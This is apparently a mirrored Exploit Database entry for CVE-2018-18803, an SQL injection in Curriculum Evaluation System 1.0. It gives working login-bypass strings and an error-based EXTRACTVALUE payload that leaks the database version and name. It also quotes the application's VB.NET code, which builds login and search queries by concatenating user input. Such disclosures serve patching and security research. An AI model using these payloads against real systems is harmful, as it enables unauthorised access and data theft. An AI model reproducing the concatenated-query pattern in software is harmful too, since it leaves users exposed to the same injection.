Curriculum Evaluation System 1.0 – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Ihsan Sencan
  日期： 2018-10-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45719/

• # Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
  # Dork: N/A
  # Date: 2018-10-29
  # Exploit Author: Ihsan Sencan
  # Vendor Homepage: https://www.sourcecodester.com/users/janobe
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
  # Version: 1.0
  # Category: Windows
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: CVE-2018-18803
  
  # POC: 
  # 1)
  # User: 'or 1=1 or ''='
  # ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
  
  # POC: 
  # 2)
  # User: 'or 1=1 or ''='
  # Pass: Null
  # 
  # https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
  
  #[PATH]/frmCourse.vb
  #....
  #47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
  #48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
  #49 reloadDtg(sql, dtglist)
  #50 End Sub
  #....
  
  #[PATH]/includes/user.vb
  #....
  #05 Public Sub login(ByVal username As Object, ByVal pass As Object)
  #06 Try
  #07 
  #08 con.Open()
  #09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
  #10 
  #11 
  #12 If dt.Rows.Count > 0 Then
  #13 If dt.Rows(0).Item("UserType") = "Administrator" Then
  #14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
  #15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
  #16 With Form1
  #17 .tsAddG.Enabled = True
  #18 .tsStudent.Enabled = True
  #19 .tsCurriculum.Enabled = True
  #20 .tsGrades.Enabled = True
  #21 .tsReport.Enabled = True
  #22 .tsUtilities.Enabled = True
  #23 .tsSearchStudent.Enabled = True
  #24 .tsLogin.Image = My.Resources.logout
  #25 .tsLogin.Text = "Logout"
  #26 End With
  #27 
  #28 
  #29 LoginForm1.Close()
  #30 
  #31 
  #32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
  #33 
  #34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
  #35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
  #36 With Form1
  #37 .tsAddG.Enabled = True
  #38 .tsStudent.Enabled = True
  #39 .tsCurriculum.Enabled = True
  #40 .tsGrades.Enabled = True
  #41 .tsReport.Enabled = True
  #42 .tsSearchStudent.Enabled = True
  #43 .tsLogin.Image = My.Resources.logout
  #44 .tsLogin.Text = "Logout"
  #45 End With
  #46 
  #47 
  #48 
  #49 
  #50 LoginForm1.Close()
  #51 
  #52 
  #53 
  #54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
  #55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
  #56 'With Form1
  #57 With Form1
  #58 .tsAddG.Enabled = True
  #59 .tsStudent.Enabled = True
  #60 .tsCurriculum.Enabled = True
  #61 .tsGrades.Enabled = True
  #62 .tsReport.Enabled = True
  #63 
  #64 .tsSearchStudent.Enabled = True
  #65 .tsLogin.Image = My.Resources.logout
  #66 .tsLogin.Text = "Logout"
  #67 End With
  #68 
  #69 
  #70 LoginForm1.Close()
  #71 End If
  #72 
  #73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
  #74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
  #75 'Form1.StatusStrip1.Visible = True
  #76 'inserting logs
  #77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
  #78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
  #79 'create(sql)
  #80 
  #81 Else
  #82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
  #83 End If
  #84 Catch ex As Exception
  #85 MsgBox(ex.Message)
  #86 End Try
  #87 con.Close()
  #88 da.Dispose()
  #89 End Sub
  #....